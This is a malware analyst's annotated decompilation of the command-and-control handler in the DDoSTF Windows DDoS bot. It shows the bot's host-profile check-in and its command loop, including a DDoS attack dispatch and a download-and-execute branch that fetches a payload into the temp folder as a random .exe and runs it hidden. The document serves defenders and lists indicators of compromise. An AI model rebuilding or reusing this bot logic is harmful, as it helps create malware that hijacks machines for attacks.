- /* MalwareMustDie!!
- DDoSTF win32 disassembled, by @unixfreaxjp
- using experimental decompiler for r2 */
- /* C2 session handler (decompiler output: symbols, types and several local
-  * names are unresolved, so this is read-only analysis text, not buildable C).
-  * Flow as shown below: fn.0x4027FD() yields a value that is stored in the
-  * global dword.0x40890C and used as a socket by send()/select()/recv();
-  * a host profile is assembled (CPU, hostname, UI language, "ver 7.0"),
-  * a 520-byte check-in whose leading DWORD is 11 is sent, then a
-  * select()/recv() loop dispatches on the command code var15 (cases 5..9).
-  * Returns the last closesocket() result, or the falsy fn.0x4027FD() value
-  * when no socket was obtained.
-  * Defender notes (grounded in this listing only): the fixed 520-byte
-  * check-in, the dynamic resolution of urlmon!URLDownloadToFileA, and a drop
-  * path of "<temp dir>\<5 lowercase letters>.exe" launched with WinExec are
-  * the observable artefacts. */
- fn.0x40483B()
- {
- result = fn.0x4027FD(); // presumably the connect routine; a non-zero result is treated as the C2 socket below - TODO confirm
- dword.9x40890C = result; // NOTE(review): "9x" is almost certainly a decompiler/paste typo for the global dword.0x40890C used everywhere else
- if ( result )
- {
- strcpy($Src, var11); // unbounded copy into the profile buffer; "$Src" and the later "&Src" appear to be the same object (decompiler naming)
- SleepTrick(); // analyst's name for a delay routine between steps - presumably Sleep-based, TODO confirm
- fn.0x402F9F(); // query HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0
- // (registry read for CPU speed and processor description; goes into the profile)
- SleepTrick();
- GetSystemInfo(&SystemInfo); // System information
- SleepTrick();
- SystemInfo.dwNumberOfProcessors; // CPU info - bare expression statement: the decompiler dropped the store, the value is presumably copied into the profile
- GetComputerNameA(&Buffer, &nSize); // Hostname
- GetSystemDefaultUILanguage(); // DefaultUILanguage (return value store not recovered by the decompiler)
- SleepTrick();
- strcpy(&var31, "ver 7.0"); // bot version string embedded in the profile - a stable string IOC candidate
- SleepTrick();
- *(_DWORD *)buf = 11; // message type/opcode of the check-in at offset 0
- memcpy(&Dst, &Src, 0xA0); // 0xA0 = 160 bytes of host profile appended to buf (Dst presumably lies inside buf - TODO confirm offsets)
- SleepTrick();
- if ( send(dword.0x40890C, buf, 520, 0) != -1 ) // fixed 520-byte check-in; -1 is SOCKET_ERROR
- {
- while ( 1 ) // command loop: runs until select() or recv() fails
- {
- readfds.fd_array[0] = dword.0x40890C; // Winsock fd_set, rebuilt each iteration with the single C2 socket
- readfds.fd_count = 1;
- var2 = select(dword.0x40890C + 1, &readfds, 0, 0, 0); // no timeout: blocks until readable or error
- if ( var2 == -1 )
- break;
- if ( var2 && _WSAFDIsSet(dword.0x40890C, &readfds) )
- {
- var3 = recv(dword.0x40890C, &var12, 388, 0); // at most 388 bytes of command data into var12
- if ( !v3 || var3 == -1 ) // v3 and var3 are the same variable (decompiler naming); 0 = peer closed, -1 = error
- {
- closesocket(dword.0x40890C);
- break;
- }
- memcpy(&var14, &var12, 0x208); // 0x208 = 520 bytes, more than the 388 recv() can deliver; stale bytes beyond the received length are copied - likely a decompiler-sized buffer, TODO confirm
- switch (var15) // command code, presumably a field at a fixed offset inside var14 - TODO confirm
- {
- case 5:
- memcpy(&Params, &var16, 0x184); // 0x184 = 388 bytes of attack parameters taken from the received message
- fn.0x403F05(&Params); // go to 12 attack cascade switch ala BillGates
- break;
- case 6:
- dword.0x408938 = 0; // clears a global flag; presumably the "attack running" flag read by fn.0x403F05 - TODO confirm
- break;
- case 7:
- CmdLine = 0; Source = 0; // download-and-execute: zero the path/name buffers first
- memset(&var19, 0, 0x100);
- var20 = 0; var21 = 0;
- memset(&var23, 0, 0x7C);
- var24 = 0; var25 = 0;
- GetTempPathA(0x104, &CmdLine); // 0x104 = MAX_PATH; drop directory is the user's temp path
- var4 = fn.0x4022DB(26) + 97;// one random lowercase letter: 97 == 'a', fn.0x4022DB(26) presumably returns 0..25 - TODO confirm
- var5 = fn.0x4022DB(26) + 97;// second random letter
- var6 = fn.0x4022DB(26) + 97;// third random letter
- var7 = fn.0x4022DB(26) + 97;// fourth random letter
- var8 = fn.0x4022DB(26); // fifth letter, +97 is applied in the wsprintfA argument below
- wsprintfA(&Source, "\\%c%c%c%c%c.exe", [var8 + 97], var7, var6, var5, var4); // file name = "\" + 5 random letters + ".exe" (detection: random 5-letter .exe in %TEMP%)
- strcat(&CmdLine, &Source); // unbounded append; CmdLine is now the full drop path
- var9 = LoadLibraryA("urlmon.dll"); // URLDownloadToFileA is resolved at runtime, so it does not appear in the static import table
- var10 = GetProcAddress(v9, "URLDownloadToFileA"); // download payload.. (v9/v10 are var9/var10, decompiler naming)
- ((void (__stdcall *)(_DWORD, char *, char *, signed int, _DWORD))v10)(0, &var16, &CmdLine, 10, 0); // URL comes from the received message (var16), destination is CmdLine; return value is not checked
- WinExec(&CmdLine, 0); // execute the payload.. (0 == SW_HIDE); runs even if the download failed
- break;
- case 8:
- dword.0x40893C = 0; // global flag cleared before starting the worker; case 9 sets it back to 1, so it presumably acts as a stop signal for fn.0x404659 - TODO confirm
- CreateThread(0, 0, fn.0x404659, 0, 0, 0); // threaded process start
- break;
- case 9:
- dword.0x40893C = 1; // see case 8
- break;
- }
- }
- }
- }
- result = closesocket(dword.0x40890C); // second closesocket() on the same handle when the loop left via the recv failure path above
- }
- return result;
- }